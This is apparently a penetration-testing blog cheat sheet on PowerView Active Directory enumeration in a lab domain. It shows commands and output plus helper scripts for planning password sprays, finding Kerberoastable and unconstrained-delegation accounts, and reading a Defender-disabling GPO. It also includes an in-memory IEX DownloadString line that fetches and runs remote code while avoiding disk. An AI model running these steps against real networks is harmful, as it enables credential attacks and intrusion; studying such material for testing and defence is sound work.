PowerView AD Enumeration


Intro

Hello all, today I will give a quick overview of PowerView.ps1 and its useful AD enumeration commands. First I'll go over loading the PowerView module into PowerShell, then I will show some of the commands with sample output; think of this as a cheat sheet for PowerView.

Download Link: PowerSploit Repo

Loading PowerView.ps1

First, make sure you are in the same directory as the PowerView.ps1 file. A file downloaded from the internet carries the mark-of-the-web (a Zone.Identifier alternate data stream), so we also need to unblock it with the Unblock-File cmdlet, and the session's execution policy must allow scripts to run. Be aware that PowerView.ps1 is signatured by Windows Defender and most other AV products: on a host with real-time protection enabled the download is likely to be quarantined before you get to the next step.

Downloading:

curl -o PowerView.ps1 https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

(Lowercase -o names the output file; uppercase -O takes no argument and would make curl treat "PowerView.ps1" as a second URL. In Windows PowerShell, curl is an alias for Invoke-WebRequest and -o resolves to its -OutFile parameter, so the same line works there too.)

Unblocking:

PS C:\Users\Administrator> Unblock-File .\PowerView.ps1
PS C:\Users\Administrator>

Loading:

PS C:\Users\Administrator> . .\PowerView.ps1

Note the leading dot: the script has to be dot-sourced so its functions are defined in the current scope. Running it as .\PowerView.ps1 executes it in a child scope and leaves nothing behind.
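The three steps above in one script, as an added example that is not part of the original post or of PowerSploit. It fetches the file, removes the mark-of-the-web only if it is present, sets a process-scoped execution policy when the current one would block scripts, dot-sources PowerView and then verifies that the functions used in the rest of this post actually exist. It assumes the host can reach GitHub and that you are allowed to change the execution policy for your own process.

```powershell
# Added example: download, unblock, load and verify PowerView. Assumes internet
# access from the host and permission to change the process execution policy.
$Url  = 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'
$Path = Join-Path $PWD 'PowerView.ps1'

# Invoke-WebRequest is what the curl alias resolves to in Windows PowerShell;
# naming it directly avoids the curl / curl.exe flag confusion.
Invoke-WebRequest -Uri $Url -OutFile $Path -UseBasicParsing

# Files from the internet get a Zone.Identifier alternate data stream (mark-of-the-web);
# that stream is what makes PowerShell refuse the script until it is unblocked.
if (Get-Item -Path $Path -Stream Zone.Identifier -ErrorAction SilentlyContinue) {
    Unblock-File -Path $Path
}

# Scripts still need an execution policy that allows them. Bypass for this
# process only, so the machine-wide setting is left alone.
if ((Get-ExecutionPolicy) -in 'Restricted', 'AllSigned') {
    Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
}

# Dot-source so the functions land in the current scope.
. $Path

# Verify the cmdlets this cheat sheet relies on are now available.
$Expected = 'Get-NetDomain', 'Get-NetDomainController', 'Get-DomainPolicy',
            'Get-NetUser', 'Get-NetComputer', 'Get-NetGroup',
            'Invoke-UserHunter', 'Invoke-ShareFinder', 'Get-NetGPO'
$Missing = $Expected | Where-Object { -not (Get-Command $_ -ErrorAction SilentlyContinue) }
if ($Missing) { throw "PowerView did not define: $($Missing -join ', ')" }
"PowerView loaded, $($Expected.Count) expected functions present"
```

If you would rather not touch disk at all, `IEX (New-Object Net.WebClient).DownloadString($Url)` loads the same script straight from memory and needs neither Unblock-File nor an execution-policy change; it is also the most heavily signatured way of doing it, so expect AMSI to object on a defended host.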

Enumeration Commands

Domain Information

Get-NetDomain

Shows information about the current domain, including its domain controllers and which DC holds each FSMO role.

PS C:\Users\Administrator> Get-NetDomain

Forest                  : lab.local
DomainControllers       : {LAB-DC-1.lab.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : LAB-DC-1.lab.local
RidRoleOwner            : LAB-DC-1.lab.local
InfrastructureRoleOwner : LAB-DC-1.lab.local
Name                    : lab.local

PS C:\Users\Administrator>

Get-NetDomainController

Returns the domain controller object for the current domain: its name, IP address, site, OS version and the FSMO roles it holds. Note that the IPAddress shown in this lab is a link-local IPv6 address (fe80::); the IPv4 address reported by Invoke-UserHunter below is usually the one you actually want.

PS C:\Users\Administrator> Get-NetDomainController

Forest                     : lab.local
CurrentTime                : 28/06/2020 17:29:18
HighestCommittedUsn        : 16443
OSVersion                  : Windows Server 2019 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : lab.local
IPAddress                  : fe80::10cd:dd9b:b02:d70%6
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {}
OutboundConnections        : {}
Name                       : LAB-DC-1.lab.local
Partitions                 : {DC=lab,DC=local, CN=Configuration,DC=lab,DC=local, CN=Schema,CN=Configuration,DC=lab,DC=local,
                             DC=DomainDnsZones,DC=lab,DC=local...}

PS C:\Users\Administrator>

Get-DomainPolicy

Parses the Default Domain Policy's GptTmpl.inf from SYSVOL and returns it section by section. The "System Access" section is the password and lockout policy, which is exactly what you need to read before any password spraying: a LockoutBadCount of 0, as in this lab, means no lockout threshold is configured at all, and MinimumPasswordLength plus PasswordComplexity tell you what a candidate password has to look like.

PS C:\Users\Administrator> Get-DomainPolicy
Name                           Value
----                           -----
Kerberos Policy                {MaxTicketAge, MaxServiceAge, MaxClockSkew, MaxRenewAge...}
System Access                  {MinimumPasswordAge, MaximumPasswordAge, LockoutBadCount, PasswordComplexity...}
Version                        {Revision, signature}
Registry Values                {MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash}
Unicode                        {Unicode}

PS C:\Users\Administrator> (Get-DomainPolicy)."system access"
Name                           Value
----                           -----
MinimumPasswordAge             {1}
MaximumPasswordAge             {42}
LockoutBadCount                {0}
PasswordComplexity             {1}
RequireLogonToChangePassword   {0}
LSAAnonymousNameLookup         {0}
ForceLogoffWhenHourExpire      {0}
PasswordHistorySize            {24}
ClearTextPassword              {0}
MinimumPasswordLength          {7}

PS C:\Users\Administrator>
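As an added example (not from the original post), the snippet below turns the "System Access" section into a spray-planning summary: whether lockout is on, how many attempts per account per observation window stay safely under the threshold, and the password constraints. It assumes the master-branch PowerView behaviour visible above, where every setting is a one-element string array (hence the {0} / {1} in the output) and the LockoutDuration / ResetLockoutCount keys only exist when a threshold is set. The sample object is constructed from the lab output; on a domain member with PowerView loaded pass (Get-DomainPolicy).'System Access' instead.

```powershell
# Added example: summarise the password/lockout policy returned by PowerView's
# Get-DomainPolicy. Assumes each setting is a one-element string array.
function Get-SprayPolicySummary {
    [CmdletBinding()]
    param([Parameter(Mandatory)] $SystemAccess)

    # Pull the integer out of the one-element array, or $null if the key is absent
    # (the lockout duration/window keys are only written when a threshold exists).
    function Get-Setting([string]$Name) {
        $raw = $SystemAccess.$Name
        if ($null -eq $raw) { return $null }
        return [int](@($raw)[0])
    }

    $threshold = Get-Setting 'LockoutBadCount'
    $window    = Get-Setting 'ResetLockoutCount'   # minutes until badPwdCount resets
    $duration  = Get-Setting 'LockoutDuration'     # minutes locked; -1 = until an admin unlocks

    # Stay two attempts short of the threshold per window to leave room for bad
    # attempts from other sources (stale mapped drives, scheduled tasks, etc.).
    $safePerWindow = if ($threshold -gt 0) { [Math]::Max($threshold - 2, 1) } else { 'unlimited' }

    [pscustomobject]@{
        MinimumPasswordLength  = Get-Setting 'MinimumPasswordLength'
        ComplexityRequired     = (Get-Setting 'PasswordComplexity') -eq 1
        MaximumPasswordAgeDays = Get-Setting 'MaximumPasswordAge'
        PasswordHistorySize    = Get-Setting 'PasswordHistorySize'
        ReversibleEncryption   = (Get-Setting 'ClearTextPassword') -eq 1
        LockoutEnabled         = $threshold -gt 0
        LockoutThreshold       = $threshold
        ObservationWindowMin   = $window
        LockoutDurationMin     = $duration
        SafeAttemptsPerWindow  = $safePerWindow
    }
}

# Constructed sample mirroring the "System Access" output above. Replace with
# (Get-DomainPolicy).'System Access' when PowerView is loaded on a domain member.
$sample = [pscustomobject]@{
    MinimumPasswordAge    = @('1')
    MaximumPasswordAge    = @('42')
    LockoutBadCount       = @('0')
    PasswordComplexity    = @('1')
    PasswordHistorySize   = @('24')
    ClearTextPassword     = @('0')
    MinimumPasswordLength = @('7')
}
Get-SprayPolicySummary -SystemAccess $sample
```

For the lab values this reports LockoutEnabled false and SafeAttemptsPerWindow "unlimited"; in a real domain with, say, a threshold of 5 and a 30 minute window it would tell you to send at most 3 guesses per account every half hour. Fine-grained password policies (PSOs) are not in GptTmpl.inf, so a user covered by a PSO can still lock out even when this summary says otherwise.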

Users, Groups and Computers

Get-NetUser

Returns every user object in the domain with all of its attributes; pipe it to select to keep only the properties you care about.

PS C:\Users\Administrator> Get-NetUser | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt
svc-backup
svc-tgt


PS C:\Users\Administrator>

Get-NetComputer

Lists the computers joined to the domain (names only by default); add the -FullData flag to get the full object with every LDAP attribute, as below.

PS C:\Users\Administrator> Get-NetComputer -FullData

pwdlastset                    : 27/06/2020 19:27:27
logoncount                    : 9
msds-generationid             : {138, 162, 14, 106...}
serverreferencebl             : CN=LAB-DC-1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=lab,DC=local
badpasswordtime               : 01/01/1601 00:00:00
distinguishedname             : CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 27/06/2020 20:26:58
name                          : LAB-DC-1
objectsid                     : S-1-5-21-1086465519-1901182224-3361014284-1000
samaccountname                : LAB-DC-1$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : 805306369
whenchanged                   : 27/06/2020 19:36:56
accountexpires                : 9223372036854775807
countrycode                   : 0
adspath                       : LDAP://CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
instancetype                  : 4
msdfsr-computerreferencebl    : CN=LAB-DC-1,CN=Topology,CN=Domain System
                                Volume,CN=DFSR-GlobalSettings,CN=System,DC=lab,DC=local
objectguid                    : 69302386-0a0e-4824-8f29-6517ba022186
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 01/01/1601 00:00:00
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata         : {27/06/2020 18:27:12, 01/01/1601 00:00:01}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/LAB-DC-1.lab.local,
                                ldap/LAB-DC-1.lab.local/ForestDnsZones.lab.local,
                                ldap/LAB-DC-1.lab.local/DomainDnsZones.lab.local, TERMSRV/LAB-DC-1...}
usncreated                    : 12293
lastlogon                     : 28/06/2020 12:05:21
badpwdcount                   : 0
cn                            : LAB-DC-1
useraccountcontrol            : 532480
whencreated                   : 27/06/2020 18:27:08
primarygroupid                : 516
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 12775
ridsetreferences              : CN=RID Set,CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
dnshostname                   : LAB-DC-1.lab.local

PS C:\Users\Administrator>

Get-NetGroup

Lists the groups in the domain. Narrow it down with Get-NetGroup -GroupName "Domain Admins", and use Get-NetGroupMember -GroupName "Domain Admins" to see who is actually in a group.

PS C:\Users\Administrator> Get-NetGroup
Administrators
Users
Print Operators
Remote Desktop Users
Network Configuration Operators
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
PS C:\Users\Administrator>

Get-NetUser -SPN

Lists every user account with a Service Principal Name set. These are the Kerberoasting candidates: any domain user can request a service ticket for an SPN and crack it offline, so an SPN on a privileged account is the first thing to note. Here svc-backup is a member of Backup Operators with admincount set, and its useraccountcontrol of 66048 is NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD, so whatever password it was created with is the one it still has.

PS C:\Users\Administrator> Get-NetUser -SPN

logoncount            : 0
badpasswordtime       : 01/01/1601 00:00:00
distinguishedname     : CN=svc-backup,CN=Users,DC=lab,DC=local
objectclass           : {top, person, organizationalPerson, user}
displayname           : svc-backup
userprincipalname     : svc-backup@lab.local
name                  : svc-backup
objectsid             : S-1-5-21-1086465519-1901182224-3361014284-1103
samaccountname        : svc-backup
admincount            : 1
codepage              : 0
samaccounttype        : 805306368
whenchanged           : 28/06/2020 17:17:26
accountexpires        : 9223372036854775807
countrycode           : 0
adspath               : LDAP://CN=svc-backup,CN=Users,DC=lab,DC=local
instancetype          : 4
usncreated            : 12780
objectguid            : ad3fcb7a-397d-48be-9c9c-3c85c1a0f056
lastlogoff            : 01/01/1601 00:00:00
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata : {27/06/2020 19:41:28, 27/06/2020 19:39:59, 01/01/1601 00:00:00}
serviceprincipalname  : LAB/Backup
givenname             : svc-backup
memberof              : CN=Backup Operators,CN=Builtin,DC=lab,DC=local
lastlogon             : 01/01/1601 00:00:00
badpwdcount           : 0
cn                    : svc-backup
useraccountcontrol    : 66048
whencreated           : 27/06/2020 19:39:59
primarygroupid        : 513
pwdlastset            : 27/06/2020 20:39:59
usnchanged            : 16431

PS C:\Users\Administrator>

Invoke-UserHunter -Unconstrained -ShowAll

Finds computers that allow unconstrained Kerberos delegation and lists the users with sessions on them; -ShowAll returns every session rather than only those belonging to Domain Admins, which is the default hunt. Domain controllers always have unconstrained delegation enabled, which is why LAB-DC-1 shows up here. A member server or workstation in this list is the interesting case, since anyone who authenticates to it leaves a reusable TGT in its memory.

PS C:\Users\Administrator> Invoke-UserHunter -Unconstrained -ShowAll


UserDomain      : LAB
UserName        : Administrator
ComputerName    : LAB-DC-1.lab.local
IPAddress       : 192.168.0.49
SessionFrom     :
SessionFromName :
LocalAdmin      :

UserDomain      : LAB
UserName        : LAB-DC-1$
ComputerName    : LAB-DC-1.lab.local
IPAddress       : 192.168.0.49
SessionFrom     :
SessionFromName :
LocalAdmin      :

PS C:\Users\Administrator>
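Both the SPN output and the unconstrained-delegation result above come down to bits in useraccountcontrol and msds-supportedencryptiontypes, which PowerView returns as raw integers. The function below, an added example that is not part of the original post or of PowerView, decodes them and produces a one-line triage record per account. It works on the objects from Get-NetUser -SPN and Get-NetComputer -FullData (lower-case property names as shown in this post); the two sample objects are constructed from the svc-backup and LAB-DC-1 output above so it runs without a domain. The flag values are the documented Active Directory bit masks.

```powershell
# Added example: decode userAccountControl / msDS-SupportedEncryptionTypes from
# PowerView output. Works on Get-NetUser -SPN and Get-NetComputer -FullData objects.
$UacFlags = [ordered]@{
    ACCOUNTDISABLE                 = 0x0002
    PASSWD_NOTREQD                 = 0x0020
    NORMAL_ACCOUNT                 = 0x0200
    WORKSTATION_TRUST_ACCOUNT      = 0x1000
    SERVER_TRUST_ACCOUNT           = 0x2000      # domain controller
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000     # unconstrained delegation
    NOT_DELEGATED                  = 0x100000    # "account is sensitive and cannot be delegated"
    DONT_REQ_PREAUTH               = 0x400000    # AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
}
$EncTypes = [ordered]@{ 'DES-CBC-CRC' = 0x1; 'DES-CBC-MD5' = 0x2; 'RC4-HMAC' = 0x4; 'AES128' = 0x8; 'AES256' = 0x10 }

function ConvertFrom-BitFlags([long]$Value, $Table) {
    @($Table.Keys | Where-Object { ($Value -band $Table[$_]) -ne 0 })
}

function Get-AccountTriage {
    param([Parameter(Mandatory, ValueFromPipeline)] $Object)
    process {
        $uac   = [long](@($Object.useraccountcontrol)[0])
        $flags = ConvertFrom-BitFlags $uac $UacFlags
        # No msDS-SupportedEncryptionTypes means the KDC falls back to RC4, the
        # fastest ticket type to crack after a Kerberoast.
        $etRaw  = @($Object.'msds-supportedencryptiontypes')[0]
        $etypes = if ($null -eq $etRaw) { @('RC4-HMAC (attribute unset)') }
                  else { ConvertFrom-BitFlags ([long]$etRaw) $EncTypes }
        $pwdSet = @($Object.pwdlastset)[0]
        [pscustomobject]@{
            SamAccountName          = $Object.samaccountname
            IsComputer              = [bool](@($Object.objectclass) -contains 'computer')
            SPNs                    = @($Object.serviceprincipalname) -join ', '
            AdminCount              = [int](@($Object.admincount)[0])
            PasswordNeverExpires    = $flags -contains 'DONT_EXPIRE_PASSWORD'
            PasswordAgeDays         = if ($pwdSet -is [datetime]) { [int]((Get-Date) - $pwdSet).TotalDays } else { $null }
            UnconstrainedDelegation = $flags -contains 'TRUSTED_FOR_DELEGATION'
            AsRepRoastable          = $flags -contains 'DONT_REQ_PREAUTH'
            EncryptionTypes         = $etypes -join ', '
            UacFlags                = $flags -join ', '
            MemberOf                = @($Object.memberof) -join '; '
        }
    }
}

# Constructed samples copied from the svc-backup and LAB-DC-1 output in this post.
$svc = [pscustomobject]@{
    samaccountname = 'svc-backup'; objectclass = @('top', 'person', 'organizationalPerson', 'user')
    serviceprincipalname = 'LAB/Backup'; admincount = 1; useraccountcontrol = 66048
    pwdlastset = [datetime]::new(2020, 6, 27, 20, 39, 59)
    memberof = 'CN=Backup Operators,CN=Builtin,DC=lab,DC=local'
}
$dc = [pscustomobject]@{
    samaccountname = 'LAB-DC-1$'; objectclass = @('top', 'person', 'organizationalPerson', 'user', 'computer')
    serviceprincipalname = @('ldap/LAB-DC-1.lab.local/DomainDnsZones.lab.local', 'TERMSRV/LAB-DC-1')
    admincount = $null; useraccountcontrol = 532480; 'msds-supportedencryptiontypes' = 28
    pwdlastset = [datetime]::new(2020, 6, 27, 19, 27, 27); memberof = $null
}
$svc, $dc | Get-AccountTriage | Format-List

# Live usage once PowerView is loaded:
#   Get-NetUser -SPN | Get-AccountTriage
#   Get-NetComputer -FullData | Get-AccountTriage | Where-Object UnconstrainedDelegation
```

For the lab objects this decodes 66048 to NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD and 532480 to SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION, which is precisely why the DC appears in the Invoke-UserHunter -Unconstrained output; 28 decodes to RC4-HMAC, AES128, AES256, while svc-backup has no value set and will therefore be issued RC4 tickets. PowerView's Get-NetComputer also takes a -Unconstrained switch that applies the same TRUSTED_FOR_DELEGATION test as an LDAP filter on the server side.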

Group Policy and Shares

Invoke-ShareFinder

Lists the shares on every reachable computer in the domain. In a one-DC lab you only see the default shares; in a real domain add -ExcludeStandard to drop the ADMIN$, C$ and IPC$ style shares and -CheckShareAccess to report only the shares the current user can actually read.

PS C:\Users\Administrator> Invoke-ShareFinder
\\LAB-DC-1.lab.local\ADMIN$     - Remote Admin
\\LAB-DC-1.lab.local\C$         - Default share
\\LAB-DC-1.lab.local\IPC$       - Remote IPC
\\LAB-DC-1.lab.local\NETLOGON   - Logon server share
\\LAB-DC-1.lab.local\SYSVOL     - Logon server share
PS C:\Users\Administrator>

Get-NetGPO

Shows every GPO in the domain. Display names can reveal interesting things, such as a GPO that disables antivirus, but the name is only a label: the actual settings live under gpcfilesyspath in SYSVOL (Registry.pol for registry-based policy, GptTmpl.inf for security settings), and Get-NetGPO -ComputerName <host> tells you which GPOs really apply to a given machine.

PS C:\Users\Administrator> Get-NetGPO

usncreated              : 16448
displayname             : Disable Windows Defender
whenchanged             : 28/06/2020 18:34:44
objectclass             : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly  : True
usnchanged              : 16453
dscorepropagationdata   : 01/01/1601 00:00:00
name                    : {5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
adspath                 : LDAP://CN={5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D},CN=Policies,CN=System,DC=lab,DC=local
flags                   : 0
cn                      : {5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
gpcfilesyspath          : \\lab.local\SysVol\lab.local\Policies\{5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
distinguishedname       : CN={5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D},CN=Policies,CN=System,DC=lab,DC=local
whencreated             : 28/06/2020 18:34:44
versionnumber           : 0
instancetype            : 4
objectguid              : cb0c35eb-c890-471c-98b1-1b99e64b67cc
objectcategory          : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=lab,DC=local

PS C:\Users\Administrator>
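A GPO called "Disable Windows Defender" is only worth anything if it actually sets the Defender keys, and the place to check is the Registry.pol file under the gpcfilesyspath shown above. The code below, an added example that is not part of the original post or of PowerView, is a minimal reader for that format (an ASCII "PReg" signature, a version DWORD, then UTF-16LE records of the form [key;value;type;size;data]). It also includes a small encoder, used only to build a sample file in memory from the two registry values the real "Turn off Microsoft Defender Antivirus" policy writes, so the example runs without SYSVOL access.

```powershell
# Added example: read Registry.pol so a GPO's settings can be checked against its name.
# Layout: 'PReg' + version DWORD, then UTF-16LE records [key;value;type;size;data].
$Unicode      = [System.Text.Encoding]::Unicode
$RegTypeNames = @{ 1 = 'REG_SZ'; 2 = 'REG_EXPAND_SZ'; 3 = 'REG_BINARY'; 4 = 'REG_DWORD'; 7 = 'REG_MULTI_SZ' }

# Encode one record the way Group Policy writes it (used here only to build the sample).
function New-RegistryPolEntry([string]$Key, [string]$Value, [uint32]$Type, [byte[]]$Data) {
    $out = New-Object System.Collections.Generic.List[byte]
    $out.AddRange($Unicode.GetBytes('[' + $Key + "`0;" + $Value + "`0;"))
    $out.AddRange([BitConverter]::GetBytes($Type));                $out.AddRange($Unicode.GetBytes(';'))
    $out.AddRange([BitConverter]::GetBytes([uint32]$Data.Length)); $out.AddRange($Unicode.GetBytes(';'))
    $out.AddRange($Data)
    $out.AddRange($Unicode.GetBytes(']'))
    return ,$out.ToArray()
}

function Read-RegistryPol([byte[]]$Bytes) {
    if ([System.Text.Encoding]::ASCII.GetString($Bytes, 0, 4) -ne 'PReg') { throw 'Not a Registry.pol file' }
    $pos = 8                                              # skip signature and version
    while ($pos + 2 -le $Bytes.Length) {
        if ($Unicode.GetString($Bytes, $pos, 2) -ne '[') { throw "Malformed record at offset $pos" }
        $pos += 2
        $strings = foreach ($i in 1..2) {                 # key, then value name: NUL-terminated, then ';'
            $end = $pos
            while ($Bytes[$end] -ne 0 -or $Bytes[$end + 1] -ne 0) { $end += 2 }
            $Unicode.GetString($Bytes, $pos, $end - $pos)
            $pos = $end + 4
        }
        $type = [BitConverter]::ToUInt32($Bytes, $pos); $pos += 6   # DWORD + ';'
        $size = [BitConverter]::ToUInt32($Bytes, $pos); $pos += 6   # DWORD + ';'
        $data = if ($size -gt 0) { [byte[]]($Bytes[$pos..($pos + $size - 1)]) } else { [byte[]]@() }
        $pos += $size + 2                                           # data + ']'
        $decoded = switch ([int]$type) {
            4               { [BitConverter]::ToUInt32($data, 0) }
            { $_ -in 1, 2 } { $Unicode.GetString($data).TrimEnd("`0") }
            7               { $Unicode.GetString($data).TrimEnd("`0") -split "`0" }
            default         { ($data | ForEach-Object { $_.ToString('x2') }) -join '' }
        }
        [pscustomobject]@{
            Key   = $strings[0]
            Value = $strings[1]
            Type  = if ($RegTypeNames.ContainsKey([int]$type)) { $RegTypeNames[[int]$type] } else { "type $type" }
            Data  = $decoded
        }
    }
}

# Constructed sample: the two values a "turn off Defender" GPO writes.
$header  = [System.Text.Encoding]::ASCII.GetBytes('PReg') + [BitConverter]::GetBytes([uint32]1)
$records = (New-RegistryPolEntry 'SOFTWARE\Policies\Microsoft\Windows Defender' 'DisableAntiSpyware' 4 ([BitConverter]::GetBytes([uint32]1))) +
           (New-RegistryPolEntry 'SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' 'DisableRealtimeMonitoring' 4 ([BitConverter]::GetBytes([uint32]1)))
$sample  = [byte[]]($header + $records)

Read-RegistryPol $sample | Format-Table Key, Value, Type, Data -AutoSize

# Against a real GPO object from Get-NetGPO (machine side; use User\ for user policy):
#   Read-RegistryPol ([IO.File]::ReadAllBytes("$($gpo.gpcfilesyspath)\Machine\Registry.pol"))
```

The sample decodes to two REG_DWORD values of 1 under the Windows Defender policy keys, which is what a genuine AV-disabling GPO looks like. Reading SYSVOL this way only needs the read access every domain user already has, so it is a quiet check compared with querying the target host directly.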

Conclusions

Well, I hope you found this article somewhat interesting or at the very least informative, and if you did, consider dropping me a +rep on HTB or a follow on Twitter. If you want to read up more about these commands, take a look here: GitHub Gist.
